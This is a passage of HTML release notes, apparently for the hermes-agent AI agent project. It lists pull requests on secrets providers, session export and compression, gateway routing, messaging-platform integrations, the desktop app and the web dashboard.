<li>Hooks: oversized hook-injected context spills to disk (<a href="https://github.com/NousResearch/hermes-agent/pull/20468" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20468/hovercard">#20468</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Vibe reactions — floating hearts on affection across CLI/TUI/desktop, token-free core detection (<a href="https://github.com/NousResearch/hermes-agent/pull/62016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62016/hovercard">#62016</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Secrets &amp; config</h3>
<ul>
<li>Pluggable <code>SecretSource</code> interface + Bitwarden &amp; 1Password providers (see Highlights) (<a href="https://github.com/NousResearch/hermes-agent/pull/59498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59498/hovercard">#59498</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>)</li>
<li><code>hermes config get</code> / <code>unset</code>; warn on unknown root config keys + doctor deprecated-key reporting; <code>display.timestamp_format</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/65540" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65540/hovercard">#65540</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67370" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67370/hovercard">#67370</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40622" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40622/hovercard">#40622</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Auxiliary model usage recorded per task in session accounting; conversation-scoped Nous Portal usage tags across aux/MoA/delegate calls; <code>--usage-file</code> JSON report for <code>hermes -z</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/65537" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65537/hovercard">#65537</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65468" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65468/hovercard">#65468</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59615" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59615/hovercard">#59615</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Sessions &amp; compression</h3>
<ul>
<li>Sessions export: Markdown/QMD/HTML/prompt-only/trace formats, HF upload, <code>--redact</code>, unified filters; full prune filter surface + bulk archive; CLI workspace filter + restore-cwd-on-resume (<a href="https://github.com/NousResearch/hermes-agent/pull/60186" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60186/hovercard">#60186</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60492" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60492/hovercard">#60492</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60507/hovercard">#60507</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59327/hovercard">#59327</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63091" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63091/hovercard">#63091</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>)</li>
<li>Compression: preserve human intent and durable handoffs; retain prompt cache when memory is unchanged; flatten multimodal content for the summarizer keeping image handles; gateway compression routing integrity (<a href="https://github.com/NousResearch/hermes-agent/pull/67275" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67275/hovercard">#67275</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67916" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67916/hovercard">#67916</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65046" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65046/hovercard">#65046</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56868" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56868/hovercard">#56868</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Gateway session metadata consolidated into state.db; routing index moved to state.db (sessions.json now an optional legacy mirror); exact API bytes persisted in an <code>api_content</code> sidecar (<a href="https://github.com/NousResearch/hermes-agent/pull/58899" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58899/hovercard">#58899</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59203" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59203/hovercard">#59203</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67274" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67274/hovercard">#67274</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h2>🌐 Gateway, Fleet &amp; Relay</h2>
<ul>
<li><strong>Durable delivery-obligation ledger</strong> for final responses (see Highlights) (<a href="https://github.com/NousResearch/hermes-agent/pull/67181" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67181/hovercard">#67181</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Profile-based routing for inbound messages</strong> + multiplex hardening wave 2 + <code>GATEWAY_MULTIPLEX_PROFILES</code> override (see Highlights) (<a href="https://github.com/NousResearch/hermes-agent/pull/64835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64835/hovercard">#64835</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65700" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65700/hovercard">#65700</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60589" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60589/hovercard">#60589</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> + salvaged contributors)</li>
<li>Per-session turn lease + conversation-scope funnel; unified session reset boundaries (reset sessions stay reset); truthful runtime readiness checks; per-channel model and system prompt overrides; per-session <code>/model</code> overrides persist across restarts (<a href="https://github.com/NousResearch/hermes-agent/pull/67401" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67401/hovercard">#67401</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65783" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65783/hovercard">#65783</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/62645" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62645/hovercard">#62645</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56967" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56967/hovercard">#56967</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57030" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57030/hovercard">#57030</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Session auto-reset default off; <code>/sessions search &lt;query&gt;</code>; webhook payload filters + route scripts; platform HTTP event callback routing; configurable long-running status phrases (<a href="https://github.com/NousResearch/hermes-agent/pull/60194" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60194/hovercard">#60194</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57685" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57685/hovercard">#57685</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60944" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60944/hovercard">#60944</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65702" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65702/hovercard">#65702</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58872" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58872/hovercard">#58872</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Relay: generic OIDC client-credentials provisioning (NAS-free), routed profile carried from the connector wire source, channel context consumed from the connector; Nous auth forensics + <code>nous_session_valid</code> on <code>/api/status</code> for hosted self-heal; Docker re-seeds a terminally-dead Nous bootstrap session on boot (<a href="https://github.com/NousResearch/hermes-agent/pull/60730" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60730/hovercard">#60730</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60586" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60586/hovercard">#60586</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64649" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64649/hovercard">#64649</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59976" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59976/hovercard">#59976</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59969/hovercard">#59969</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59983" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59983/hovercard">#59983</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
</ul>
<h2>📱 Messaging Platforms</h2>
<ul>
<li><strong>Inline choice pickers</strong> for <code>/reasoning</code> and <code>/fast</code> on Telegram, Discord, and Matrix — one-tap native buttons instead of typing (<a href="https://github.com/NousResearch/hermes-agent/pull/65799" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65799/hovercard">#65799</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>WhatsApp: native Baileys polls (clarify renders as a poll), locations, rich inbound metadata; dashboard pairing flow (<a href="https://github.com/NousResearch/hermes-agent/pull/58865" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58865/hovercard">#58865</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60571" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60571/hovercard">#60571</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Discord: recover messages missed during reconnect; auto-created threads renamed to generated session titles; configurable interactive view timeout; opt-in owner mentions on exec-approval prompts; optional admin-only gate for approval buttons (<a href="https://github.com/NousResearch/hermes-agent/pull/66149" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66149/hovercard">#66149</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60187" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60187/hovercard">#60187</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60230" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60230/hovercard">#60230</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60493" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60493/hovercard">#60493</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51751" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51751/hovercard">#51751</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Slack: live per-tool status line (<a href="https://github.com/NousResearch/hermes-agent/pull/67080" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67080/hovercard">#67080</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, salvaging <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4854171101" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/62007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62007/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/62007">#62007</a>)</li>
<li>Telegram: per-topic free-response allowlist; Google Chat clarify prompts rendered as cards (<a href="https://github.com/NousResearch/hermes-agent/pull/65543" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65543/hovercard">#65543</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65546" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65546/hovercard">#65546</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Voice: <code>stt.echo_transcripts</code> toggle; MEDIA: captions attached to the media bubble on standalone sends; <code>display.tool_progress: log</code> option (<a href="https://github.com/NousResearch/hermes-agent/pull/58859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58859/hovercard">#58859</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61415" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61415/hovercard">#61415</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57014" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57014/hovercard">#57014</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h2>🖥️ Hermes Desktop App</h2>
<ul>
<li><strong>Contribution-driven shell on a layout-tree model</strong> — panes, zones, and layouts as data; plugin-scoped i18n locale bundles followed (<a href="https://github.com/NousResearch/hermes-agent/pull/60638" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60638/hovercard">#60638</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67303" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67303/hovercard">#67303</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><strong>Capabilities page</strong> — Skills/Tools/MCP + Hub in one place, with responsive overlay nav; CLI/dashboard parity for skills hub, MCP test/toggle/catalog, maintenance ops, log filters; five UX fixes from live testing (<a href="https://github.com/NousResearch/hermes-agent/pull/57590" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57590/hovercard">#57590</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57441" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57441/hovercard">#57441</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67482" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67482/hovercard">#67482</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Hermes Cloud connection mode</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4773549207" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/55402" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55402/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/55402">#55402</a>); soft gateway switch + gateway-settings polish; terminal execution backend picker with health probes (<a href="https://github.com/NousResearch/hermes-agent/pull/61912" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61912/hovercard">#61912</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61916" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61916/hovercard">#61916</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67203" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67203/hovercard">#67203</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Keybind hint tooltips + keybinds settings tab + unified worktree dialog; base-branch picker for new worktrees; green unread dot for background-finished sessions; background-task sidebar indicators; grouped tool calls across text-less messages; auto-scrolling window for long tool-call runs (<a href="https://github.com/NousResearch/hermes-agent/pull/65204" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65204/hovercard">#65204</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/62243" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62243/hovercard">#62243</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65109" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65109/hovercard">#65109</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65174" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65174/hovercard">#65174</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61147" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61147/hovercard">#61147</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57913" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57913/hovercard">#57913</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Session + project color system (inherit from project, per-session override, shared across sidebar/tabs); unified active-project identity in chat status; workspace path status action (<a href="https://github.com/NousResearch/hermes-agent/pull/67469" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67469/hovercard">#67469</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67681" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67681/hovercard">#67681</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67282" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67282/hovercard">#67282</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63086" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63086/hovercard">#63086</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Declarative memory-provider panel + full-config modal; config-defined TTS/STT providers + xAI TTS params; custom endpoint settings; per-job cron model picker; profile-aware approval mode control; UI scale setting; Ctrl/Cmd+wheel zoom; chat backdrop toggle; <code>/journey</code> opens the memory graph overlay (<a href="https://github.com/NousResearch/hermes-agent/pull/67206" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67206/hovercard">#67206</a> salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erosika/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erosika">@erosika</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67209" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67209/hovercard">#67209</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67759" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67759/hovercard">#67759</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67472" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67472/hovercard">#67472</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63520" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63520/hovercard">#63520</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60457" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60457/hovercard">#60457</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67029" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67029/hovercard">#67029</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64598" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64598/hovercard">#64598</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57267" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57267/hovercard">#57267</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Full TypeScript conversion of the desktop tree (<a href="https://github.com/NousResearch/hermes-agent/pull/57855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57855/hovercard">#57855</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
</ul>
<h2>📊 Web Dashboard</h2>
<ul>
<li>Memory provider switching; safe session import flow; WhatsApp pairing; Discord-specific toolsets editable from the web UI; clarified manual Telegram bot setup (<a href="https://github.com/NousResearch/hermes-agent/pull/60569" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60569/hovercard">#60569</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63699" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63699/hovercard">#63699</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60571" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60571/hovercard">#60571</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65361" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65361/hovercard">#65361</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64636" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64636/hovercard">#64636</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>)</li>
<li>Terminal keep-alive + reattach for dashboard chat sessions; heavy turns isolated in a compute host; paste/drop images into Chat; <code>browser.headed</code> schema toggle; profile + gateway topology on <code>/api/status</code>; mobile/hosted OpenAI OAuth login (<a href="https://github.com/NousResearch/hermes-agent/pull/60515" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60515/hovercard">#60515</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65895" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65895/hovercard">#65895</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61929" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61929/hovercard">#61929</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67046" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67046/hovercard">#67046</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60537" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60537/hovercard">#60537</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61330" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61330/hovercard">#61330</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
